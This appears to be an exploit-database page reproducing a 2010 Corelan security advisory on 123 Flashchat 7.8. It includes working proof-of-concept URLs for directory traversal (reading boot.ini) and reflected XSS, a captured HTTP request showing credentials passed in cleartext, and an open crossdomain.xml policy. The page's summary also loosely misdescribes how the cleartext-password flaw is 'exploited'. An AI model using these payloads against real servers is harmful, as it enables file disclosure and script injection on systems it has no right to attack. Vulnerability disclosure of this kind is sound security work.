header-logo
Suggest Exploit
vendor:
123 Flashchat
by:
Lincoln
7,5
CVSS
HIGH
Multiple Remote Vulnerabilities
79, 79, 312
CWE
Product Name: 123 Flashchat
Affected Version From: 7.8
Affected Version To: 7.8
Patch Exists: YES
Related CWE: N/A
CPE: a:123flashchat:123_flashchat
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2010

123 Flashchat version 7.8 Remote

123 Flashchat version 7.8 is vulnerable to Directory Traversal, XSS and Password sent via clear text. Directory Traversal can be exploited by sending a specially crafted HTTP request containing directory traversal sequences (e.g. “/../../../../../../boot.ini”) to the vulnerable server. XSS can be exploited by sending a specially crafted HTTP request containing malicious JavaScript code (e.g. “<script>alert(“Corelan”)</script>”) to the vulnerable server. Password sent via clear text can be exploited by sending a specially crafted HTTP request containing the user’s credentials (e.g. “username=admin&password=admin”) to the vulnerable server.

Mitigation:

Upgrade to the latest version of 123 Flashchat, apply the latest security patches, and configure the application and system securely.
Source

Exploit-DB raw data:

        |------------------------------------------------------------------|
        |                         __               __                      |
        |   _________  ________  / /___ _____     / /____  ____ _____ ___  |
        |  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |
        | / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
        | \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |
        |                                                                  |
        |                                       http://www.corelan.be:8800 |
        |                                              security@corelan.be |
        |                                                                  |
        |-------------------------------------------------[ EIP Hunters ]--|
 
# Software      : 123 Flashchat version 7.8 Remote
# Author        : Lincoln
# Date          : August 16, 2010
# Reference     : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-060
# OS            : Windows
# Tested on     : XP SP3 En (Virtual box)
# Type of vuln  : Multiple Remote Vulnerabilities
# Greetz to     : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.



0x01 : Directory Traversal

http://192.168.2.15:35555/%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini


0x02 : XSS

http://192.168.2.15:35555/index.html%27%22--%3E%3Cscript%3Ealert%28%22Corelan%22%29%3C/script%3E


0x03 : Password sent via clear test

http://127.0.0.1:35555/lite-chat-login.html

GET /lite.swf HTTP/1.1
Host: 192.168.2.15:35555
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5A
ccept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://192.168.2.15:35555/lite_client.html?init_user=admin&init_password=mycoolpassword&init_room=1&init_skin=blue


0x04 : Open Crossdomain Policy 

http://127.0.0.1:35555/crossdomain.xml  

Policy Rules: <allow-access-from domain="*" secure="false" />

<policy-file-request/>.<cross-domain-policy><allow-access-from to-ports="51127" domain="*"></allow-access-from></cross-domain-policy>.

"Open Policy Crossdomain.xml file allows other SWF files to make HTTP requests to your web server and see its response. This can be used for accessing one time tokens and CSRF nonces to bypass CSRF restrictions." Netsparker web app scanner